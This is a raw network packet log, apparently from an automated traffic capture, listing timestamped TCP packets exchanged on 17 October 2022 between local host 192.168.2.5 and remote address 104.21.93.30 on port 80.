                                                                                                                                  Oct 17, 2022 22:06:38.691265106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691289902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691310883 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691314936 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691339016 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691361904 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691365957 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691390991 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691406012 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691416025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691441059 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691451073 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691468000 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691497087 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691513062 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691523075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691545010 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691559076 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691569090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691595078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691620111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691641092 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691660881 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691684008 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691708088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691709042 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691735029 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691750050 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691761971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691787004 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691797018 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691812038 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691837072 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691859007 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691859961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691888094 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691899061 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691914082 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691937923 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691958904 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.691962957 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.691987991 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692008972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692023993 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692049026 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692068100 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692073107 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692097902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692110062 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692122936 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692157984 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692171097 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692183971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692203999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692226887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692238092 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692270994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692272902 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692295074 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692320108 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692329884 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692344904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692372084 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692384005 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692409992 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692435980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692461014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692462921 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692487001 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692511082 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692527056 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692552090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692564964 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692575932 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692600012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692611933 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692625046 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692656994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692662001 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692682028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692706108 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692725897 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692745924 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692750931 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692779064 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692784071 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692816019 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692828894 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692840099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692862988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692871094 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692887068 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692919016 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692919970 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692945004 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692970037 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.692980051 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.692995071 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693028927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693030119 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693053007 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693078041 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693090916 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693101883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693126917 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693137884 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693150997 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693187952 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693192005 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693217039 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693242073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693252087 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693268061 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693290949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693300962 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693321943 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693352938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693361998 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693377018 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693403959 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693414927 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693429947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693464994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693466902 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693491936 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693516970 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693542004 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693548918 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693571091 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693584919 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693600893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693627119 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693639994 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693651915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693676949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693685055 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693708897 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693738937 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693748951 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693763971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693789959 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693798065 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693814993 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693840027 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693850994 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693871975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693897963 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693908930 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693922997 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693948030 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.693958044 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.693975925 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694025040 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694031954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694057941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694084883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694092989 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694118023 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694144011 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694154978 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694169044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694195032 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694205046 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694220066 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694253922 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694253922 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694287062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694312096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694320917 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694336891 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694364071 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694380045 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694396019 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694422960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694433928 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694448948 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694469929 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694494963 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694499016 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694533110 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694545984 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694559097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694587946 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694591999 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694619894 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694653988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694664001 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694684982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694716930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694725037 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694741964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694766045 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694780111 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694791079 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694823027 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694830894 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694848061 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694873095 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694904089 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694914103 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694940090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694953918 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.694962978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.694987059 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695009947 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695022106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695055962 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695067883 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695080042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695103884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695118904 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695127964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695152044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695163965 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695174932 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695210934 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695211887 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695238113 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695262909 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695276976 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695286036 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695310116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695319891 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695336103 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695378065 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695379019 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695404053 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695429087 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695442915 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695452929 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695478916 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695488930 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695503950 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695528030 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695554018 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.695576906 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.695597887 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.939995050 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.972403049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972444057 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972462893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972481012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972498894 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972516060 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972520113 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.972533941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972559929 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972572088 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.972584009 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972601891 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.972610950 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972635031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972656965 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972676992 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972702980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972728014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972750902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972775936 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972800016 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972826958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972850084 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.972852945 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972878933 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972903967 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972929001 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972929955 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.972954988 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.972954988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972980976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.972994089 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973006010 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973030090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973056078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973057032 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973074913 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973090887 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973098993 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973124027 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973131895 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973149061 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973172903 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973185062 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973193884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973217010 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973239899 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973239899 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973263979 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973274946 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973284960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973309040 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973330975 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973334074 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973356009 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973378897 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973383904 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973404884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973428965 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973428965 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973453999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973478079 CEST8049692104.21.93.30192.168.2.5
